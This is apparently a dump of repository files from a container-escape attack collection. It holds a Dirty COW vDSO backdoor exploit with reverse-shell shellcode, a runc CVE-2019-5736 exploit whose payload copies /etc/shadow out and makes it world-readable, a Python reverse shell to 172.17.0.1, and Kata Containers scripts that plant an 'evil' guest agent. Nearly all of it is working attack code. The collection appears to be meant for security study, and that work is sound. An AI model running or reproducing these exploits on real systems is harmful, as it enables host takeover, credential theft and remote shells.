sizeof(child_stack) - 8, flags, arg);\n\tif (pid == -1) {\n\t\twarn(\"clone\");\n\t\treturn NULL;\n\t}\n\n\tif (waitpid(pid, &status, __WALL) == -1) {\n\t\twarn(\"waitpid\");\n\t\treturn NULL;\n\t}\n\n\tret = NULL;\n\twhile (!arg->stop) {\n\t\tif (arg->do_patch)\n\t\t\tret2 = backdoor_vdso(pid, arg->patch_number);\n\t\telse\n\t\t\tret2 = restore_vdso(pid, arg->patch_number);\n\n\t\tif (ret2 == -1) {\n\t\t\tret = NULL;\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (ptrace(PTRACE_CONT, pid, NULL, NULL) == -1)\n\t\twarn(\"ptrace(PTRACE_CONT)\");\n\n\tif (waitpid(pid, NULL, __WALL) == -1)\n\t\twarn(\"waitpid\");\n\n\treturn ret;\n}\n\nstatic int exploit_helper(struct mem_arg *arg)\n{\n\tpthread_t pth1, pth2;\n\tint ret, status;\n\tpid_t pid;\n\n\tfprintf(stderr, \"[*] %s: patch %d/%ld\\n\",\n\t\targ->do_patch ? \"exploit\" : \"restore\",\n\t\targ->patch_number + 1,\n\t\tARRAY_SIZE(vdso_patch));\n\n\t/* run \"check\" in a different memory space */\n\tpid = fork();\n\tif (pid == -1) {\n\t\twarn(\"fork\");\n\t\treturn -1;\n\t} else if (pid == 0) {\n\t\tcheck(arg);\n\t}\n\n\targ->stop = false;\n\tpthread_create(&pth1, NULL, madviseThread, arg);\n\tpthread_create(&pth2, NULL, ptrace_thread, arg);\n\n\t/* wait for \"check\" process */\n\tif (waitpid(pid, &status, 0) == -1) {\n\t\twarn(\"waitpid\");\n\t\treturn -1;\n\t}\n\n\t/* tell the 2 threads to stop and wait for them */\n\targ->stop = true;\n\tpthread_join(pth1, NULL);\n\tpthread_join(pth2, NULL);\n\n\t/* check result */\n\tret = WIFEXITED(status) ? WEXITSTATUS(status) : -1;\n\tif (ret == 0) {\n\t\tfprintf(stderr, \"[*] vdso successfully %s\\n\",\n\t\t\targ->do_patch ? \"backdoored\" : \"restored\");\n\t} else {\n\t\tfprintf(stderr, \"[-] failed to win race condition...\\n\");\n\t}\n\n\treturn ret;\n}\n\n/*\n * Apply vDSO patches in the correct order.\n *\n * During the backdoor step, the payload must be written before hijacking the\n * function prologue. 
During the restore step, the prologue must be restored\n * before removing the payload.\n */\nstatic int exploit(struct mem_arg *arg, bool do_patch)\n{\n\tunsigned int i;\n\tint ret;\n\n\tret = 0;\n\targ->do_patch = do_patch;\n\n\tfor (i = 0; i < ARRAY_SIZE(vdso_patch); i++) {\n\t\tif (do_patch)\n\t\t\targ->patch_number = i;\n\t\telse\n\t\t\targ->patch_number = ARRAY_SIZE(vdso_patch) - i - 1;\n\n\t\tif (exploit_helper(arg) != 0) {\n\t\t\tret = -1;\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn ret;\n}\n\nstatic int create_socket(uint16_t port)\n{\n\tstruct sockaddr_in addr;\n\tint enable, s;\n\n\ts = socket(AF_INET, SOCK_STREAM, 0);\n\tif (s == -1) {\n\t\twarn(\"socket\");\n\t\treturn -1;\n\t}\n\n\tenable = 1;\n\tif (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &enable, sizeof(enable)) == -1)\n\t\twarn(\"setsockopt(SO_REUSEADDR)\");\n\n\taddr.sin_family = AF_INET;\n\taddr.sin_addr.s_addr = INADDR_ANY;\n\taddr.sin_port = port;\n\n\tif (bind(s, (struct sockaddr *) &addr, sizeof(addr)) == -1) {\n\t\twarn(\"failed to bind socket on port %d\", ntohs(port));\n\t\tclose(s);\n\t\treturn -1;\n\t}\n\n\tif (listen(s, 1) == -1) {\n\t\twarn(\"listen\");\n\t\tclose(s);\n\t\treturn -1;\n\t}\n\n\treturn s;\n}\n\n/* interact with reverse connect shell */\nstatic int yeah(struct mem_arg *arg, int s)\n{\n\tstruct sockaddr_in addr;\n\tstruct pollfd fds[2];\n\tsocklen_t addr_len;\n\tchar buf[4096];\n\tnfds_t nfds;\n\tint c, n;\n\n\tfprintf(stderr, \"[*] waiting for reverse connect shell...\\n\");\n\n\taddr_len = sizeof(addr);\n\twhile (1) {\n\t\tc = accept(s, (struct sockaddr *)&addr,\t&addr_len);\n\t\tif (c == -1) {\n\t\t\tif (errno == EINTR)\n\t\t\t\tcontinue;\n\t\t\twarn(\"accept\");\n\t\t\treturn -1;\n\t\t}\n\t\tbreak;\n\t}\n\n\tclose(s);\n\n\tfprintf(stderr, \"[*] enjoy!\\n\");\n\n\tif (fork() == 0) {\n\t\tif (exploit(arg, false) == -1)\n\t\t\tfprintf(stderr, \"[-] failed to restore vDSO\\n\");\n\t\texit(0);\n\t}\n\n\tfds[0].fd = STDIN_FILENO;\n\tfds[0].events = POLLIN;\n\n\tfds[1].fd = 
c;\n\tfds[1].events = POLLIN;\n\n\tnfds = 2;\n\twhile (nfds > 0) {\n\t\tif (poll(fds, nfds, -1) == -1) {\n\t\t\tif (errno == EINTR)\n\t\t\t\tcontinue;\n\t\t\twarn(\"poll\");\n\t\t\tbreak;\n\t\t}\n\n\t\tif (fds[0].revents == POLLIN) {\n\t\t\tn = read(STDIN_FILENO, buf, sizeof(buf));\n\t\t\tif (n == -1) {\n\t\t\t\tif (errno != EINTR) {\n\t\t\t\t\twarn(\"read(STDIN_FILENO)\");\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t} else if (n == 0) {\n\t\t\t\tbreak;\n\t\t\t} else {\n\t\t\t\twriteall(c, buf, n);\n\t\t\t}\n\t\t}\n\n\t\tif (fds[1].revents == POLLIN) {\n\t\t\tn = read(c, buf, sizeof(buf));\n\t\t\tif (n == -1) {\n\t\t\t\tif (errno != EINTR) {\n\t\t\t\t\twarn(\"read(c)\");\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t} else if (n == 0) {\n\t\t\t\tbreak;\n\t\t\t} else {\n\t\t\t\twriteall(STDOUT_FILENO, buf, n);\n\t\t\t}\n\t\t}\n\t}\n\n\treturn 0;\n}\n\nstatic struct prologue *fingerprint_prologue(void *vdso_addr)\n{\n\tunsigned long clock_gettime_addr;\n\tuint32_t clock_gettime_offset;\n\tuint64_t entry_point;\n\tstruct prologue *p;\n\tint i;\n\n\t/* e_entry */\n\tentry_point = *(uint64_t *)((unsigned char *)vdso_addr + 0x18);\n\tclock_gettime_offset = (uint32_t)entry_point & 0xfff;\n\tclock_gettime_addr = (unsigned long)vdso_addr + clock_gettime_offset;\n\n\tfor (i = 0; i < ARRAY_SIZE(prologues); i++) {\n\t\tp = &prologues[i];\n\t\tif (memcmp((void *)clock_gettime_addr, p->opcodes, p->size) == 0)\n\t\t\treturn p;\n\t}\n\n\treturn NULL;\n}\n\n/*\n * 1.2.3.4:1337\n */\nstatic int parse_ip_port(char *str, uint32_t *ip, uint16_t *port)\n{\n\tchar *p;\n\tint ret;\n\n\tstr = strdup(str);\n\tif (str == NULL) {\n\t\twarn(\"strdup\");\n\t\treturn -1;\n\t}\n\n\tp = strchr(str, ':');\n\tif (p != NULL && p[1] != '\\x00') {\n\t\t*p = '\\x00';\n\t\t*port = htons(atoi(p + 1));\n\t}\n\n\tret = (inet_aton(str, (struct in_addr *)ip) == 1) ? 
0 : -1;\n\tif (ret == -1)\n\t\twarn(\"inet_aton(%s)\", str);\n\n\tfree(str);\n\treturn ret;\n}\n\nint main(int argc, char *argv[])\n{\n\tstruct prologue *prologue;\n\tstruct mem_arg arg;\n\tuint16_t port;\n\tuint32_t ip;\n\tint s;\n\n\tip = htonl(PAYLOAD_IP);\n\tport = htons(PAYLOAD_PORT);\n\n\tif (argc > 1) {\n\t\tif (parse_ip_port(argv[1], &ip, &port) != 0)\n\t\t\treturn EXIT_FAILURE;\n\t}\n\n\tfprintf(stderr, \"[*] payload target: %s:%d\\n\",\n\t\tinet_ntoa(*(struct in_addr *)&ip), ntohs(port));\n\n\targ.vdso_addr = get_vdso_addr();\n\tif (arg.vdso_addr == NULL)\n\t\treturn EXIT_FAILURE;\n\n\tprologue = fingerprint_prologue(arg.vdso_addr);\n\tif (prologue == NULL) {\n\t\tfprintf(stderr, \"[-] this vDSO version isn't supported\\n\");\n\t\tfprintf(stderr, \"    add first entry point instructions to prologues\\n\");\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tif (patch_payload(prologue, ip, port) == -1)\n\t\treturn EXIT_FAILURE;\n\n\tif (build_vdso_patch(arg.vdso_addr, prologue) == -1)\n\t\treturn EXIT_FAILURE;\n\n\ts = create_socket(port);\n\tif (s == -1)\n\t\treturn EXIT_FAILURE;\n\n\tif (exploit(&arg, true) == -1) {\n\t\tfprintf(stderr, \"exploit failed\\n\");\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tyeah(&arg, s);\n\n\treturn EXIT_SUCCESS;\n}"
  },
  {
    "path": "code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/Makefile",
    "content": "CFLAGS := -Wall\nLDFLAGS := -lpthread\n\nall: 0xdeadbeef\n\n0xdeadbeef: 0xdeadbeef.o\n\t$(CC) -o $@ $^ $(LDFLAGS)\n\n0xdeadbeef.o: 0xdeadbeef.c payload.h\n\t$(CC) -o $@ -c $< $(CFLAGS)\n\npayload.h: payload\n\txxd -i $^ $@\n\npayload: payload.s\n\tnasm -f bin -o $@ $^\n\nclean:\n\trm -f *.o *.h 0xdeadbeef"
  },
  {
    "path": "code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/payload.s",
    "content": "\t\tBITS 64\n\t\t[SECTION .text]\n\t\tglobal _start\n\nSYS_OPEN\tequ 0x2\nSYS_SOCKET\tequ 0x29\nSYS_CONNECT\tequ 0x2a\nSYS_DUP2\tequ 0x21\nSYS_FORK\tequ 0x39\nSYS_EXECVE\tequ 0x3b\nSYS_EXIT\tequ 0x3c\nSYS_READLINK\tequ 0x59\nSYS_GETUID\tequ 0x66\n\nAF_INET\t\tequ 0x2\nSOCK_STREAM\tequ 0x1\n\nIP\t\tequ 0xdeadc0de\t;; patched by 0xdeadbeef.c\nPORT\t\tequ 0x1337\t;; patched by 0xdeadbeef.c\n\n_start:\n\t\t;; save registers\n\t\tpush\trdi\n\t\tpush\trsi\n\t\tpush\trdx\n\t\tpush\trcx\n\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\t\t;;\n\t\t;; return if getuid() != 0\n\t\t;;\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\n\t\tmov\trax, SYS_GETUID\n\t\tsyscall\n\t\ttest\trax, rax\n\t\tjne\treturn\n\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\t\t;;\n\t\t;; check if whithin a container (PROC_PID_INIT_INO = 0xEFFFFFFC)\n\t\t;; return if $(readlink /proc/1/ns/pid) != \"pid:[4026531836]\"\n\t\t;;\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\n\t\tcall\tget_strings\n\t\tlea\trsi, [rsp-16]\n\t\tmov\trdx, 16\t\t\t; strlen(\"pid:[4026531836]\")\n\t\tmov\trax, SYS_READLINK\n\t\tsyscall\n\t\tcmp\trax, rdx\n\t\tjne\treturn\n\t\tadd\trdi, 15\t\t\t; \"pid:[4026531836]\"\n\t\tmov\trcx, rdx\n\t\trepe cmpsb\n\t\tjne\treturn\n\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\t\t;;\n\t\t;; return if open(\"/tmp/.x\", O_CREAT|O_EXCL, x) == -1\n\t\t;;\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\n\t\tmov     rsi, 0x00782e2f706d742f\n\t\tpush    rsi\n\t\tmov     rdi, rsp\n\t\tmov     rsi, 192\n\t\tmov     rax, SYS_OPEN\n\t\tsyscall\n\t\ttest    rax, rax\n\t\tpop     rsi\n\t\tjs      return\n\n\t\t;; fork\n\t\tmov     rax, SYS_FORK\n\t\tsyscall\n\t\ttest    rax, rax\n\t\tjne\treturn\n\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\t\t;;\n\t\t;; reverse connect 
(https://www.exploit-db.com/exploits/35587/)\n\t\t;;\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\n\t\t;; sockfd = socket(AF_INET, SOCK_STREAM, 0)\n\t\txor\trsi, rsi\t; 0 out rsi\n\t\tmul\tesi\t\t; 0 out rax, rdx ; rdx = IPPROTO_IP (int: 0)\n\t\tinc\trsi             ; rsi = SOCK_STREAM\n\t\tpush\tAF_INET\n\t\tpop\trdi\n\t\tadd\tal, SYS_SOCKET\n\t\tsyscall\n\n\t\t; copy socket descriptor to rdi for future use\n\t\tpush\trax\n\t\tpop\trdi\n\n\t\t; server.sin_family = AF_INET\n\t\t; server.sin_port = htons(PORT)\n\t\t; server.sin_addr.s_addr = IP\n\t\t; bzero(&server.sin_zero, 8)\n\t\tpush\trdx\n\t\tpush\trdx\n\t\tmov\tdword [rsp + 0x4], IP\n\t\tmov\tword [rsp + 0x2], PORT\n\t\tmov\tbyte [rsp], AF_INET\n\n\t\t;; connect(sockfd, (struct sockaddr *)&server, sockaddr_len)\n\t\tpush\trsp\n\t\tpop\trsi\n\t\tpush\t0x10\n\t\tpop\trdx\n\t\tpush\tSYS_CONNECT\n\t\tpop\trax\n\t\tsyscall\n\t\ttest    rax, rax\n\t\tjs      exit\n\n\t\t;; dup2(sockfd, STDIN); dup2(sockfd, STDOUT); dup2(sockfd, STDERR)\n\t\txor\trax, rax\n\t\tpush\t0x3\t\t; loop down file descriptors for I/O\n\t\tpop\trsi\ndup_loop:\n\t\tdec\tesi\n\t\tmov\tal, SYS_DUP2\n\t\tsyscall\n\t\tjne\tdup_loop\n\n\t\t;; execve('//bin/sh', NULL, NULL)\n\t\tpush\trsi\t\t; *argv[] = 0\n\t\tpop\trdx\t\t; *envp[] = 0\n\t\tpush\trsi\t\t; '\\0'\n\t\tmov\trdi, '//bin/sh'\t; str\n\t\tpush\trdi\n\t\tpush\trsp\n\t\tpop\trdi\t\t; rdi = &str (char*)\n\t\txor\trax, rax\n\t\tmov\tal, SYS_EXECVE\n\t\tsyscall\n\nexit:\n\t\txor\trax, rax\n\t\tmov\tal, SYS_EXIT\n\t\tsyscall\n\nreturn:\n\t\t;; restore registers\n\t\tpop\trcx\n\t\tpop     rdx\n\t\tpop     rsi\n\t\tpop     rdi\n\t\t;; get the caller's return address (pushed on the stack by the call instruction)\n\t\tpop     rax\n\t\t;; execute missed instructions (patched by 0xdeadbeef.c)\n\t\tdb\t0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90\n\t\t;; return to caller\n\t\tjmp     rax\n\nget_strings:\n               lea\trdi, [rel $ +8]\n               ret\n    
           db\t'/proc/1/ns/pid'\n               db\t0\n               db\t'pid:[4026531836]'"
  },
  {
    "path": "code/0304-运行时攻击/01-容器逃逸/CVE-2019-5736/main.go",
    "content": "package main\n\n// Implementation of CVE-2019-5736\n// Created with help from @singe, @_cablethief, and @feexd.\n// This commit also helped a ton to understand the vuln\n// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d\nimport (\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"os\"\n\t\"strconv\"\n\t\"strings\"\n)\n\n// This is the line of shell commands that will execute on the host\nvar payload = \"#!/bin/bash \\n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow\"\n\nfunc main() {\n\t// First we overwrite /bin/sh with the /proc/self/exe interpreter path\n\tfd, err := os.Create(\"/bin/sh\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\tfmt.Fprintln(fd, \"#!/proc/self/exe\")\n\terr = fd.Close()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\tfmt.Println(\"[+] Overwritten /bin/sh successfully\")\n\n\t// Loop through all processes to find one whose cmdline includes runcinit\n\t// This will be the process created by runc\n\tvar found int\n\tfor found == 0 {\n\t\tpids, err := ioutil.ReadDir(\"/proc\")\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn\n\t\t}\n\t\tfor _, f := range pids {\n\t\t\tfbytes, _ := ioutil.ReadFile(\"/proc/\" + f.Name() + \"/cmdline\")\n\t\t\tfstring := string(fbytes)\n\t\t\tif strings.Contains(fstring, \"runc\") {\n\t\t\t\tfmt.Println(\"[+] Found the PID:\", f.Name())\n\t\t\t\tfound, err = strconv.Atoi(f.Name())\n\t\t\t\tif err != nil {\n\t\t\t\t\tfmt.Println(err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\t// We will use the pid to get a file handle for runc on the host.\n\tvar handleFd = -1\n\tfor handleFd == -1 {\n\t\t// Note, you do not need to use the O_PATH flag for the exploit to work.\n\t\thandle, _ := os.OpenFile(\"/proc/\"+strconv.Itoa(found)+\"/exe\", os.O_RDONLY, 0777)\n\t\tif int(handle.Fd()) > 0 {\n\t\t\thandleFd = int(handle.Fd())\n\t\t}\n\t}\n\tfmt.Println(\"[+] Successfully got the file handle\")\n\n\t// Now that we have the file handle, lets 
write to the runc binary and overwrite it\n\t// It will maintain its executable flag\n\tfor {\n\t\twriteHandle, _ := os.OpenFile(\"/proc/self/fd/\"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)\n\t\tif int(writeHandle.Fd()) > 0 {\n\t\t\tfmt.Println(\"[+] Successfully got write handle\", writeHandle)\n\t\t\twriteHandle.Write([]byte(payload))\n\t\t\treturn\n\t\t}\n\t}\n}\n"
  },
  {
    "path": "code/0304-运行时攻击/01-容器逃逸/cause-core-dump.c",
    "content": "#include <stdio.h>\n\nint main(void)\n{\n    int *a = NULL;\n    *a = 1;\n    return 0;\n}"
  },
  {
    "path": "code/0304-运行时攻击/01-容器逃逸/tmp-dot-x.py",
    "content": "import os\nimport pty\nimport socket\n\nlhost = \"172.17.0.1\" # 根据实际情况修改\nlport = 10000 # 根据实际情况修改\n\ndef main():\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((lhost, lport))\n    os.dup2(s.fileno(), 0)\n    os.dup2(s.fileno(), 1)\n    os.dup2(s.fileno(), 2)\n    os.putenv(\"HISTFILE\", '/dev/null')\n    pty.spawn(\"/bin/bash\")\n    os.remove('/tmp/.x.py')\n    s.close()\n\nif __name__ == \"__main__\":\n    main()"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/build.sh",
    "content": "#!/bin/bash\n\nset -e -x\n\ncurrent_path=`pwd`\nagent_path=$GOPATH/src/github.com/kata-containers/agent/\n\n# build evil agent\ncd $agent_path\ngit checkout -- .\ngit checkout 1.10.0\ncp $current_path/evil_agent_src/* $agent_path\nsed -i 's/VERSION_COMMIT :=.*$/VERSION_COMMIT := 1.10.0-a8007c2969e839b584627d1a7db4cac13af908a6/g' $agent_path/Makefile\nmake\ncd -\ncp $agent_path/kata-agent ./docker/evil-kata-agent\n\n# build reverse shell\ngcc -o ./docker/evil_bin evil_bin.c -static\n\ndocker build -t kata-malware-image:latest docker/\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/change_container_runtime.sh",
    "content": "#!/bin/bash\n\nif [ $1 = \"kata\" ]; then\n    cat << EOF > /etc/docker/daemon.json\n{\n  \"runtimes\": {\n    \"kata-runtime\": {\n      \"path\": \"/opt/kata/bin/kata-runtime\"\n    },\n    \"kata-clh\": {\n      \"path\": \"/opt/kata/bin/kata-clh\"\n    },\n    \"kata-qemu\": {\n      \"path\": \"/opt/kata/bin/kata-qemu\"\n    }\n  },\n  \"registry-mirrors\": [\"https://docker.mirrors.ustc.edu.cn/\"]\n}\nEOF\n    cat << EOF > /etc/systemd/system/docker.service.d/kata-containers.conf\n[Service]\nExecStart=\nExecStart=/usr/bin/dockerd -D --add-runtime kata-runtime=/opt/kata/bin/kata-runtime --add-runtime kata-clh=/opt/kata/bin/kata-clh --add-runtime kata-qemu=/opt/kata/bin/kata-qemu --default-runtime=kata-runtime\nEOF\n    systemctl daemon-reload && systemctl restart docker\n\nelif [ $1 = \"runc\" ]; then\n    rm -f /etc/systemd/system/docker.service.d/kata-containers.conf\n    cat << EOF > /etc/docker/daemon.json\n{\n  \"registry-mirrors\": [\"https://docker.mirrors.ustc.edu.cn/\"]\n}\nEOF\n    systemctl daemon-reload && systemctl restart docker\n\nelse \n    echo \"Invalid container runtime.\"\nfi \n\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/clean_kata.sh",
    "content": "#!/bin/bash\n\nset -e -x\n\nrm -f /usr/bin/kata*\nrm -r /etc/kata-containers\nrm -r /opt/kata\nrm /etc/docker/daemon.json\nrm /etc/systemd/system/docker.service.d/kata-containers.conf\n\nsystemctl daemon-reload && systemctl restart docker"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/docker/Dockerfile",
    "content": "FROM ubuntu:latest\n\nCOPY bash /bash\nCOPY evil-kata-agent /evil-kata-agent\nCOPY attack.sh /attack.sh\n# Since we're targeting /bin, let's put some fake binaries in the image\nCOPY evil_bin /ls\nCOPY evil_bin /ps\nCOPY evil_bin /rm\n\nRUN chmod +x /attack.sh /evil-kata-agent /ls /ps /rm /bash\n\nENTRYPOINT [\"/attack.sh\"]\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/docker/attack.sh",
    "content": "#!/bin/bash\n\nset -e\n\necho -e \"\\t[+] In the evil container\"\necho -e \"\\t[*] Searching for the device...\"\n\nfound_clh_dev=false\nfor path in /sys/dev/block/* ; do\n\tcurr_target=$(readlink $path)\n\tif [[ $curr_target == *\"vda1\"* ]]; then\n    \tdev=$(basename $path)\n    \tguest_fs_major=$(echo $dev | cut -f1 -d:)\n    \tguest_fs_minor=$(echo $dev | cut -f2 -d:)\n    \tfound_clh_dev=true\n    \tbreak\n    fi\ndone\n\nif [ \"$found_clh_dev\" = false ]; then\n\techo -e \"\\t[!] no vda1 device, not on CLH, shutting down...\"\n\texit 1\nfi\n\necho -e \"\\t[+] Device found\"\necho -e \"\\t[*] Mknoding...\"\n\nmknod --mode 0600 /dev/guest_hd b $guest_fs_major $guest_fs_minor\n\necho -e \"\\t[+] Mknoded successfully\"\n# Ok we're on CLH, let's run the attack\necho -e \"\\t[*] Replacing the guest kata-agent...\"\n\ncmd_file=/tmp/debugfs_cmdfile\nrm -rf $cmd_file\ncat <<EOF > $cmd_file\nopen -w /dev/guest_hd\ncd /usr/bin\nrm kata-agent\nwrite /evil-kata-agent kata-agent\nclose -a\nEOF\n\n# Execute cmdfile \n/sbin/debugfs -f $cmd_file\n\necho -e \"\\t[+] Done\"\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/evil_agent_src/grpc.go",
    "content": "//\n// Copyright (c) 2017-2019 Intel Corporation\n//\n// SPDX-License-Identifier: Apache-2.0\n//\n\npackage main\n\nimport (\n\t\"bufio\"\n\t\"bytes\"\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"os\"\n\t\"os/exec\"\n\t\"path/filepath\"\n\t\"regexp\"\n\t\"strconv\"\n\t\"strings\"\n\t\"syscall\"\n\t\"time\"\n\n\tgpb \"github.com/gogo/protobuf/types\"\n\t\"github.com/kata-containers/agent/pkg/types\"\n\tpb \"github.com/kata-containers/agent/protocols/grpc\"\n\t\"github.com/opencontainers/runc/libcontainer\"\n\t\"github.com/opencontainers/runc/libcontainer/configs\"\n\t\"github.com/opencontainers/runc/libcontainer/seccomp\"\n\t\"github.com/opencontainers/runc/libcontainer/specconv\"\n\t\"github.com/opencontainers/runc/libcontainer/utils\"\n\t\"github.com/opencontainers/runtime-spec/specs-go\"\n\t\"github.com/sirupsen/logrus\"\n\t\"golang.org/x/net/context\"\n\t\"golang.org/x/sys/unix\"\n\t\"google.golang.org/grpc/codes\"\n\tgrpcStatus \"google.golang.org/grpc/status\"\n)\n\ntype agentGRPC struct {\n\tsandbox *sandbox\n\tversion string\n}\n\n// CPU and Memory hotplug\nconst (\n\tcpuRegexpPattern = \"cpu[0-9]*\"\n\tmemRegexpPattern = \"memory[0-9]*\"\n\tlibcontainerPath = \"/run/libcontainer\"\n)\n\nvar (\n\tsysfsCPUOnlinePath          = \"/sys/devices/system/cpu\"\n\tsysfsMemOnlinePath          = \"/sys/devices/system/memory\"\n\tsysfsMemoryBlockSizePath    = \"/sys/devices/system/memory/block_size_bytes\"\n\tsysfsMemoryHotplugProbePath = \"/sys/devices/system/memory/probe\"\n\tsysfsConnectedCPUsPath      = filepath.Join(sysfsCPUOnlinePath, \"online\")\n\tcontainersRootfsPath        = \"/run\"\n\n\t// set when StartTracing() is called.\n\tstartTracingCalled = false\n\n\t// set when StopTracing() is called.\n\tstopTracingCalled = false\n\n\tmodprobePath = \"/sbin/modprobe\"\n)\n\ntype onlineResource struct {\n\tsysfsOnlinePath string\n\tregexpPattern   string\n}\n\ntype cookie map[string]bool\n\nvar emptyResp = &gpb.Empty{}\n\nconst 
onlineCPUMemWaitTime = 100 * time.Millisecond\n\nvar onlineCPUMaxTries = uint32(100)\n\nconst cpusetMode = 0644\n\n// handleError will log the specified error if wait is false\nfunc handleError(wait bool, err error) error {\n\tif !wait {\n\t\tagentLog.WithError(err).Error()\n\t}\n\n\treturn err\n}\n\n// Online resources, nbResources specifies the maximum number of resources to online.\n// If nbResources is <= 0 then there is no limit and all resources are connected.\n// Returns the number of resources connected.\nfunc onlineResources(resource onlineResource, nbResources int32) (uint32, error) {\n\tfiles, err := ioutil.ReadDir(resource.sysfsOnlinePath)\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\n\tvar count uint32\n\tfor _, file := range files {\n\t\tmatched, err := regexp.MatchString(resource.regexpPattern, file.Name())\n\t\tif err != nil {\n\t\t\treturn count, err\n\t\t}\n\n\t\tif !matched {\n\t\t\tcontinue\n\t\t}\n\n\t\tonlinePath := filepath.Join(resource.sysfsOnlinePath, file.Name(), \"online\")\n\t\tstatus, err := ioutil.ReadFile(onlinePath)\n\t\tif err != nil {\n\t\t\t// resource cold plugged\n\t\t\tcontinue\n\t\t}\n\n\t\tif strings.Trim(string(status), \"\\n\\t \") == \"0\" {\n\t\t\tif err := ioutil.WriteFile(onlinePath, []byte(\"1\"), 0600); err != nil {\n\t\t\t\tagentLog.WithField(\"online-path\", onlinePath).WithError(err).Errorf(\"Could not online resource\")\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tcount++\n\t\t\tif nbResources > 0 && count == uint32(nbResources) {\n\t\t\t\treturn count, nil\n\t\t\t}\n\t\t}\n\t}\n\n\treturn count, nil\n}\n\nfunc onlineCPUResources(nbCpus uint32) error {\n\tresource := onlineResource{\n\t\tsysfsOnlinePath: sysfsCPUOnlinePath,\n\t\tregexpPattern:   cpuRegexpPattern,\n\t}\n\n\tvar count uint32\n\tfor i := uint32(0); i < onlineCPUMaxTries; i++ {\n\t\tr, err := onlineResources(resource, int32(nbCpus-count))\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tcount += r\n\t\tif count == nbCpus {\n\t\t\treturn 
nil\n\t\t}\n\t\ttime.Sleep(onlineCPUMemWaitTime)\n\t}\n\n\treturn fmt.Errorf(\"only %d of %d were connected\", count, nbCpus)\n}\n\nfunc onlineMemResources() error {\n\tresource := onlineResource{\n\t\tsysfsOnlinePath: sysfsMemOnlinePath,\n\t\tregexpPattern:   memRegexpPattern,\n\t}\n\n\t_, err := onlineResources(resource, -1)\n\treturn err\n}\n\n// updates a cpuset cgroup path, visiting each sub-directory in the cgroupPath parent and writing\n// the maximal set of cpus to its cpuset.cpus file; finally, cgroupPath itself is updated with the requested\n// value.\n// cookies are used for performance reasons so that we\n// don't update a cgroup twice.\nfunc updateCpusetPath(cgroupPath string, newCpuset string, cookies cookie) error {\n\t// Each cpuset cgroup parent MUST BE updated with the actual number of vCPUs.\n\t// Start updating from the cgroup system root.\n\tcgroupParentPath := cgroupCpusetPath\n\n\tcpusetGuest, err := getCpusetGuest()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Update parents with max set of current cpus\n\t// Iterate over all parent dirs in order.\n\t// This is needed to ensure each cgroup parent has the cpus needed\n\t// by the request.\n\tcgroupsParentPaths := strings.Split(filepath.Dir(cgroupPath), \"/\")\n\tfor _, path := range cgroupsParentPaths {\n\t\t// Skip if empty.\n\t\tif path == \"\" {\n\t\t\tcontinue\n\t\t}\n\n\t\tcgroupParentPath = filepath.Join(cgroupParentPath, path)\n\n\t\t// check if the cgroup was already updated.\n\t\tif cookies[cgroupParentPath] {\n\t\t\tagentLog.WithField(\"path\", cgroupParentPath).Debug(\"cpuset cgroup already updated\")\n\t\t\tcontinue\n\t\t}\n\n\t\tcpusetCpusParentPath := filepath.Join(cgroupParentPath, \"cpuset.cpus\")\n\n\t\tagentLog.WithField(\"path\", cpusetCpusParentPath).Debug(\"updating cpuset parent cgroup\")\n\n\t\tif err := ioutil.WriteFile(cpusetCpusParentPath, []byte(cpusetGuest), cpusetMode); err != nil {\n\t\t\treturn fmt.Errorf(\"Could not update parent cpuset cgroup (%s) 